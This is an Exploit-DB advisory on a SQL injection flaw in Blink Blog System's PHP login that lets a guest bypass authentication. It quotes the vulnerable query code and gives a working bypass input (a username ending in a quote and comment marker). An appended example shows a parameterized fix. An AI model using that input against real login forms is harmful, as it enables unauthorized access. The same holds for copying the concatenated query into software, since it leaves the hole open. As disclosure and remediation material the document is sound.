- 18 Dec 2022
- EDB-ID
- 9348
- EDB Verified
- Passed
- Author
- SALVATORE FRESTA
- Vulnerability type
- WEBAPPS
- Platform
- PHP
- CVE
- null
- Publication date
- 2009-08-03
Code:
	
	********   Salvatore "drosophila" Fresta   ********
[+] Application: Blink Blog System
[+] Version: Unknown
[+] Website: http://blogink.sourceforge.net
[+] Bugs: [A] Authentication Bypass
[+] Exploitation: Remote
[+] Date: 03 Aug 2009
[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com
***************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
***************************************************
[+] Bugs
There are many SQL Injection flaws but I post the
only one that allows a guest to bypass the login.
- [A] Authentication Bypass
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php, db.php
This bug allows a guest to bypass the login.
login.php:
    ...

    $username = $_POST["nick"];
    $password = md5($_POST["password"]);
    if ($data = $DB->usercheck($username, $password))

    ...

db.php:
    function usercheck($username, $password)
    {
        $try = mysql_query("SELECT * FROM users WHERE nick=\"".$username."\" AND password=\"".$password."\" ");

    ...
***************************************************
[+] Code
- [A] Authentication Bypass
username: root"#
password: foo
***************************************************
[+] Fix
No fix.
***************************************************
# milw0rm.com [2009-08-03]
- Source
- www.exploit-db.com
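
The advisory lists no fix. The following is an added example, not part of the original advisory or of the Blink Blog System code: a hardened usercheck() that binds the nick as a query parameter and verifies the password in PHP. It assumes PDO is available, that passwords are stored with password_hash() instead of md5(), and uses a constructed in-memory SQLite table in place of the application's MySQL database.

```php
<?php
// Added example: hardened replacement for the usercheck() lookup quoted
// in the advisory. Table layout and sample rows are constructed.

function usercheck(PDO $db, string $username, string $password): ?array
{
    // The nick is bound as a parameter, so quotes or comment markers in it
    // are compared as literal data and never parsed as SQL. This holds
    // regardless of the magic_quotes_gpc setting.
    $stmt = $db->prepare('SELECT id, nick, password FROM users WHERE nick = :nick');
    $stmt->execute([':nick' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // The password is checked in PHP against a salted hash instead of
    // being concatenated into the query as an unsalted md5() value.
    if ($row === false || !password_verify($password, $row['password'])) {
        return null;
    }
    unset($row['password']); // do not hand the hash back to the caller
    return $row;
}

// Constructed test database. With the MySQL driver, also set
// PDO::ATTR_EMULATE_PREPARES to false to get server-side prepares.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, nick TEXT UNIQUE, password TEXT)');
$ins = $db->prepare('INSERT INTO users (nick, password) VALUES (?, ?)');
$ins->execute(['root', password_hash('correct horse', PASSWORD_DEFAULT)]);

// Constructed login attempts: the advisory's input, a wrong password,
// and a valid login.
$attempts = [
    ['root"#', 'foo'],
    ['root', 'foo'],
    ['root', 'correct horse'],
];
foreach ($attempts as [$nick, $pass]) {
    $user = usercheck($db, $nick, $pass);
    printf("%-8s => %s\n", $nick, $user ? 'authenticated as ' . $user['nick'] : 'rejected');
}
```

Only the third attempt authenticates; the first is looked up as a literal nick that does not exist.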
 
 
		